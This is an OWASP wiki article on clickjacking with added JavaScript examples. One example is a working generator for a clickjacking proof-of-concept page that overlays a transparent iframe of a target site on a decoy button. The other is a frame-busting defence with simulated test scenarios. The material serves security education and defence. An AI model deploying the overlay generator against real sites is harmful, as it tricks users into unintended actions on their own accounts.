Clickjacking

From OWASP
Revision as of 18:02, 27 December 2008 by JerryH (Talk | contribs)


Clickjacking, also known as a UI Redress Attack, is an attack in which the attacker stacks multiple (often transparent) layers so that when a user clicks on an area of the web page they can see, they are actually clicking on a button or link belonging to another page.

For example, imagine an attacker who builds a web site with a button on it that says "click here for a free iPod". On top of that web page, however, the attacker has loaded your mail account in an invisible iframe and lined up its "delete all messages" button exactly on top of the "free iPod" button. The victim tries to click on the "free iPod" button but actually clicks the invisible "delete all messages" button instead. In essence, the attacker has "hijacked" the user's click, hence the name "Clickjacking".

Using the same technique, keystrokes can also be hijacked: the user believes they are typing their password into their email or bank account, but is in reality typing into an invisible frame, possibly one controlled by the attacker.
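The overlay described above, written out as a small generator for a proof-of-concept page. This is an added example and not code from the original page: the target URL, the position of the real button inside the target page, and the position of the decoy are all assumptions chosen for illustration. The one piece of arithmetic that matters is the iframe offset, which shifts the framed page so that its real button lands exactly on the decoy.

```javascript
// Added example: generator for a clickjacking proof-of-concept page.
// Not code from the original page; every URL and coordinate is an assumption.

// Offset at which the target iframe must be placed so that the target's real
// button lands exactly on top of the decoy button on the attacker's page.
function frameOffset(targetButton, decoy) {
  return { left: decoy.x - targetButton.x, top: decoy.y - targetButton.y };
}

function buildClickjackPage(opts) {
  const {
    targetUrl,     // page to embed, e.g. the victim's webmail (assumed URL)
    targetButton,  // {x, y, width, height}: where the real button sits inside that page
    decoy,         // {x, y, label}: where the bait button is drawn on the attacker page
    opacity = 0,   // 0 = fully transparent; use ~0.4 while lining things up
    frameSize = { width: 1200, height: 900 }, // large enough to contain the real button
  } = opts;

  const off = frameOffset(targetButton, decoy);

  return `<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Free iPod</title>
<style>
  body { margin: 0; }
  /* the bait the victim believes they are clicking */
  #decoy {
    position: absolute; left: ${decoy.x}px; top: ${decoy.y}px;
    width: ${targetButton.width}px; height: ${targetButton.height}px;
    z-index: 1;
  }
  /* the real target: shifted so its button covers the decoy, transparent,
     and stacked above the decoy so that it is what actually receives the click */
  #target {
    position: absolute; left: ${off.left}px; top: ${off.top}px;
    width: ${frameSize.width}px; height: ${frameSize.height}px;
    border: 0; opacity: ${opacity}; z-index: 2;
  }
</style>
</head>
<body>
<button id="decoy">${decoy.label}</button>
<iframe id="target" src="${targetUrl}" scrolling="no"></iframe>
</body>
</html>`;
}

// Constructed parameters: the "delete all messages" button is assumed to sit
// 300px from the left and 220px from the top of the framed mail page.
const EXAMPLE = {
  targetUrl: 'https://mail.example/inbox',
  targetButton: { x: 300, y: 220, width: 140, height: 32 },
  decoy: { x: 190, y: 150, label: 'Click here for a free iPod' },
};

// Write the page to disk; open the file in a browser to see the overlay,
// and pass opacity: 0.4 in the options to watch the alignment.
function writePoc(path, opts = EXAMPLE) {
  require('fs').writeFileSync(path, buildClickjackPage(opts));
  return path;
}

if (typeof require !== 'undefined' && require.main === module && process.argv[2]) {
  writePoc(process.argv[2]); // usage: node clickjack.js clickjack-poc.html
}
```

With the constructed numbers the iframe is placed at (-110px, -70px), so the point 300px/220px inside the framed page coincides with the decoy at 190px/150px. The iframe sits above the decoy in the stacking order and is fully transparent, so the browser delivers the click to the framed page's button while the victim only ever sees the bait.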

One of the most notorious examples of Clickjacking was an attack against the Adobe Flash plugin settings page:

http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager06.html

By loading this page into an invisible iframe, an attacker could trick a user into altering the security settings of Flash, giving permission for any Flash animation to utilize the computer's microphone and camera.

To prevent this from happening, Adobe added the following code to the web page:

 // "top" is the outermost window and "self" is the window this script runs in;
 // they differ only when the page has been loaded inside a frame
 if (top!=self){
       // framed: navigate the outermost window to this page, breaking out of the frame
       top.location.href=self.location.href;
 }


This code makes the page break out of any frame it is loaded into, so it can no longer serve as the invisible layer in a clickjacking attack. Note that the protection only applies while the script actually runs in the framed page: if scripting is disabled or the attacker can prevent the redirect, the page stays embedded, so treat JavaScript frame-busting as a mitigation rather than a guarantee, and prefer having the server instruct the browser not to frame the page at all (the X-Frame-Options response header) where that is available.
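A frame-busting check in the style of the Adobe snippet above, extended with a hide-by-default step so that the page stays invisible if the redirect is blocked. This is an added example, not code from the original page or from Adobe. The function takes the window and document as parameters so that the same logic can be exercised under Node against constructed stand-in objects; in a real page it would be called as frameBust(window, document) from a script in the head. The URLs are assumptions.

```javascript
// Added example: frame busting with hide-by-default. Not Adobe's or OWASP's code.

function frameBust(win, doc) {
  // Hide everything first. If the script runs but the redirect below is
  // blocked, the page stays invisible and therefore unclickable, instead of
  // quietly remaining embedded in the attacker's frame.
  doc.documentElement.style.display = 'none';

  if (win.top === win.self) {
    // Not framed: reveal the page.
    doc.documentElement.style.display = '';
    return { framed: false, redirected: false };
  }

  // Framed: navigate the top-level window to ourselves, as Adobe's code does.
  // Assigning a cross-origin top.location is permitted while reading it is
  // not, and a hostile page may block the navigation, so guard the assignment.
  try {
    win.top.location.href = win.self.location.href;
    return { framed: true, redirected: true };
  } catch (e) {
    return { framed: true, redirected: false };
  }
}

// Constructed stand-ins for window and document.
function makeWindow(href) {
  const win = { location: { href } };
  win.self = win;
  win.top = win; // top-level unless the caller points top elsewhere
  return win;
}

function makeDocument() {
  return { documentElement: { style: { display: '' } } };
}

// Three scenarios: page loaded directly, page framed by an attacker, and page
// framed by an attacker who manages to block the redirect.
function runScenarios() {
  const victimUrl = 'https://mail.example/settings';        // assumed
  const attackerUrl = 'https://attacker.example/free-ipod'; // assumed

  // 1. Loaded directly: content is shown, nothing is redirected.
  const direct = makeWindow(victimUrl);
  const directDoc = makeDocument();
  const r1 = frameBust(direct, directDoc);

  // 2. Framed: the top window is navigated to the victim page.
  const attacker = makeWindow(attackerUrl);
  const framed = makeWindow(victimUrl);
  framed.top = attacker;
  const framedDoc = makeDocument();
  const r2 = frameBust(framed, framedDoc);

  // 3. Framed, redirect blocked: a top window whose location cannot be
  //    changed. The content must remain hidden.
  const stubbornTop = makeWindow(attackerUrl);
  Object.defineProperty(stubbornTop.location, 'href', {
    get: () => attackerUrl,
    set: () => { throw new Error('navigation blocked'); },
  });
  const framed2 = makeWindow(victimUrl);
  framed2.top = stubbornTop;
  const framed2Doc = makeDocument();
  const r3 = frameBust(framed2, framed2Doc);

  return {
    direct: { ...r1, display: directDoc.documentElement.style.display },
    framed: { ...r2, display: framedDoc.documentElement.style.display,
              topHref: attacker.location.href },
    blocked: { ...r3, display: framed2Doc.documentElement.style.display,
               topHref: stubbornTop.location.href },
  };
}
```

In a real page the hiding belongs in a style rule on the html element in the head, so that it is in effect before any script runs, with the script only revealing the page once it has confirmed it is not framed. None of this helps when scripting is disabled inside the frame, which is why a server-sent instruction not to frame the page is the more robust option where the browser supports it.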